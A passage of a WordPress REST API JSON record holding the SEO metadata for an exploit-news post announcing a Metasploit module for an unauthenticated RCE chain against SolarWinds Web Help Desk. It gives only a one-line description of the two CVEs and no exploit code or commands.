vulnerability CVE-2025-40536 and an unsafe deserialization vulnerability CVE-2025-40551 to achieve unauthenticated RCE against a vulnerable SolarWinds Web Help&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-40805","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>SolarWinds Web Help Desk unauthenticated RCE_MSF:EXPLOIT-MULTI-HTTP-SOLARWINDS_WEBHELPDESK_RCE- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=40805\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SolarWinds Web Help Desk unauthenticated RCE_MSF:EXPLOIT-MULTI-HTTP-SOLARWINDS_WEBHELPDESK_RCE- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-13T19:28:03&#8243;,&#8221;description&#8221;:&#8221;This module exploits an access control bypass vulnerability CVE-2025-40536 and an unsafe deserialization vulnerability CVE-2025-40551 to achieve unauthenticated RCE against a vulnerable SolarWinds Web Help...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=40805\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-13T13:39:09+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40805#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40805\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"SolarWinds Web Help Desk unauthenticated RCE_MSF:EXPLOIT-MULTI-HTTP-SOLARWINDS_WEBHELPDESK_RCE-\",\"datePublished\":\"2026-02-13T13:39:09+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40805\"},\"wordCount\":2988,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40805#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40805\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40805\",\"name\":\"SolarWinds Web Help Desk unauthenticated RCE_MSF:EXPLOIT-MULTI-HTTP-SOLARWINDS_WEBHELPDESK_RCE- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-13T13:39:09+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40805#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40805\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40805#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"SolarWinds Web Help Desk unauthenticated RCE_MSF:EXPLOIT-MULTI-HTTP-SOLARWINDS_WEBHELPDESK_RCE-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"SolarWinds Web Help Desk unauthenticated RCE_MSF:EXPLOIT-MULTI-HTTP-SOLARWINDS_WEBHELPDESK_RCE- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=40805","og_locale":"en_US","og_type":"article","og_title":"SolarWinds Web Help Desk unauthenticated RCE_MSF:EXPLOIT-MULTI-HTTP-SOLARWINDS_WEBHELPDESK_RCE- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-13T19:28:03&#8243;,&#8221;description&#8221;:&#8221;This module exploits an access control bypass vulnerability CVE-2025-40536 and an unsafe deserialization vulnerability CVE-2025-40551 to achieve unauthenticated RCE against a vulnerable SolarWinds Web Help...","og_url":"https:\/\/zero.redgem.net\/?p=40805","og_site_name":"zero redgem","article_published_time":"2026-02-13T13:39:09+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"15 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=40805#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=40805"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"SolarWinds Web Help Desk unauthenticated RCE_MSF:EXPLOIT-MULTI-HTTP-SOLARWINDS_WEBHELPDESK_RCE-","datePublished":"2026-02-13T13:39:09+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=40805"},"wordCount":2988,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=40805#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=40805","url":"https:\/\/zero.redgem.net\/?p=40805","name":"SolarWinds Web Help Desk unauthenticated RCE_MSF:EXPLOIT-MULTI-HTTP-SOLARWINDS_WEBHELPDESK_RCE- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-13T13:39:09+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=40805#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=40805"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=40805#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"SolarWinds Web Help Desk unauthenticated RCE_MSF:EXPLOIT-MULTI-HTTP-SOLARWINDS_WEBHELPDESK_RCE-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40805","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=40805"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40805\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=40805"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=40805"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=40805"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}